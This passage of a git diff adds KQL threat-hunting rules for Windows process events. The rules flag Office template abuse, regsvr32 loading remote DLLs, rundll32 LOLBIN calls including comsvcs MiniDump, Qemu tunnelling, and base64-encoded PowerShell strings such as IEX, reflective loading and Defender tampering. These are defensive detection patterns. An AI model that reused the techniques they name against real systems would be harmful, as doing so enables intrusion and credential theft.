+| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql
new file mode 100644
index 00000000..4d5eb074
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Ping/Copy Command Combination
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql
new file mode 100644
index 00000000..5258a128
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-24
+// Level: medium
+// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql
new file mode 100644
index 00000000..a75a5257
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - FQDNs that start with a number such as "7-Zip"
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql
new file mode 100644
index 00000000..204a73e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Rundll32 Activity
+// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
new file mode 100644
index 00000000..7eff346b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File
+// Author: @kostastsale
+// Date: 2024-08-16
+// Level: medium
+// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
+// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071
+// False Positives:
+//   - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql
new file mode 100644
index 00000000..b5f1787f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Usage Of Qemu
+// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
+// Date: 2024-06-03
+// Level: medium
+// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment.
+// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.t1572
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql
new file mode 100644
index 00000000..d9e979b2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious WebDAV LNK Execution
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects possible execution via LNK file accessed on a WebDAV server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1204
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql
new file mode 100644
index 00000000..227154b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Windows App Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate packages that make use of external binaries such as Windows Terminal
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql
new file mode 100644
index 00000000..b21d0472
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded FromBase64String Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-24
+// Level: high
+// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql
new file mode 100644
index 00000000..5ad68d4b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded IEX Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-23
+// Level: high
+// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql
new file mode 100644
index 00000000..447a251d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded Invoke Keyword
+// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
+// Date: 2022-05-20
+// Level: high
+// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql
new file mode 100644
index 00000000..a61d64da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Base64 Encoded MpPreference Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-04
+// Level: high
+// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql
new file mode 100644
index 00000000..6e888d3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Base64 Encoded Reflective Assembly Load
+// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
+// Description: Detects base64 encoded .NET reflective loading of Assembly
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql
new file mode 100644
index 00000000..86b354b4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded WMI Classes
+// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-30
+// Level: high
+// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql
new file mode 100644
index 00000000..6254118c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql
@@ -0,0 +1,13 @@
+// Title: Powershell Defender Disable Scan Feature
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-03
+// Level: high
+// Description: Detects requests to disable Microsoft Defender features using PowerShell commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Possible administrative activity
+//   - Other Cmdlets that may use the same parameters
+
+DeviceProcessEvents
